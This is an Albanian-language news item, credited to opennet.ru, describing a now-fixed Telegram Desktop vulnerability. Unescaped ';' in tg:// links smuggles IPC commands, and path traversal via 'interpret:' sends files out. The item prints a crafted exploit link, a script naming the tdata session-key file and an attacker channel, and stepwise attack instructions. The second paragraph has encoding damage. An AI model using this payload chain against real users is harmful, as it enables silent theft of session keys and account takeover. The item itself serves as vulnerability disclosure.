Detajet dhe metoda e shfrytëzimit të dobësisë (CVE-2026-107181) në Telegram Desktop, klienti zyrtar i Telegram për sisteme desktop. Problemi shkaktohet nga mungesa e trajtimit të duhur të simboleve të ndarësve të paekranuar në komandat IPC, të cilat lejonin që me një klikim mbi lidhjen e dërguar, të mund të organizohej transferimi i çdo dosjeje nga sistemi i viktimës te sulmuesi, përfshirë dosjet me çelësat e sesionit, që mund të përdoren për të kapur llogarinë në Telegram. Dobësia është eliminuar në versionin Telegram Desktop 7.2.9.
Me njĂ« klikim mbi lidhjet "tg://", sistemi operativ aktivizon aplikacionin Telegram Desktop tĂ« lidhur me kĂ«tĂ« lloj lidhjesh. NĂ«se njĂ« instancĂ« tjetĂ«r e kĂ«tij aplikacioni Ă«shtĂ« tashmĂ« e hapur nĂ« sistem, procesi i hapur i dĂ«rgon lidhjen pĂ«rmes socket-it pĂ«rmes ndĂ«rfaqes IPC. Problemi Ă«shtĂ« se, nĂ«se nĂ« mes tĂ« parametrave tĂ« lidhjes Ă«shtĂ« specifikuar simboli ";" (p.sh., "tg://x?a=1;OPENâŠ"), pĂ«rmbajtja ndahet dhe pjesĂ«t qĂ« ndodhin pas simbolit ";" trajtohen si komanda tĂ« ndara.
Për realizimin e sulmit është angazhuar komanda OPEN së bashku me skemën URI "interpret:", e parashikuar për të aktivizuar skriptet shërbyese përmes IPC, të cilat janë përdorur për dërgimin automatik të lëshimeve të reja në kanale. Skripti përbëhet nga një dosje lokale e paracaktuar, në të cilën është specifikuar dosja e dërguar në kanal dhe identifikuesi i kanalit. Rruga e dosjes për skriptet trajtohet në lidhje me nënkatalogun shërbyes, por për shkak të mungesës së pastrimit të "..\/" në rrugët e dosjeve, sulmuesi ka mundësinë të aksesojë dosjet e ruajtura jashtë katalogut bazë. Për shembull, mund të ngarkohet një dosje në grupin e tij në telegram, pas së cilës mund të referohet në këtë dosje si skript, duke e përgatitur një lidhje të tipit:
tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt
Hapat e realizimit të sulmit:
- Sulmuesi shton viktimën në grupin e tij (në kufijtë e cilësimeve të zakonshme, shtimi nuk kërkon konfirmim nga i shtuar) dhe dërgon në këtë grup një dosje teksti, në të cilën është specifikuar kanali dhe rruga e skriptit. Telegram do ta ruajë këtë dosje në një nënkatalog të paracaktuar sistemor kur viktima të hyjë në grup.
kanali: 2005234537
dosja: tdata/D877F783D5D3EF8Cs - Sulmuesi i dërgon viktimës një lidhje me pamje të pafajshme për hostin e tij (p.sh., "https://coolsite.org"), e cila, kur hapet përmes ridrejtimit në server sulmuesin zëvendësohet me një URI të tipit 'tg://x?a=1;OPEN:interpret:...;OPEN:interpret:...'
- Kur klikoni në link, shfletuesi thërret trajtuesin e URI «tg://», duke nisur zinxhirin e komandave të përmendura më lart, i cili çon në dërgimin e skedarëve në kanalin e sulmuesit pa ndonjë njoftim dhe pa kërkuar konfirmimin për dërgimin.
- Duke marrë skedarët nga nënkatalogu tdata me çelësat e enkriptimit dhe autorizimit, në mungesë të një kode lokal të vendosur nga përdoruesi, sulmuesi mund të klonojë seancën e lidhjes së viktimës në pajisjen e tij.
Burimi: opennet.ru
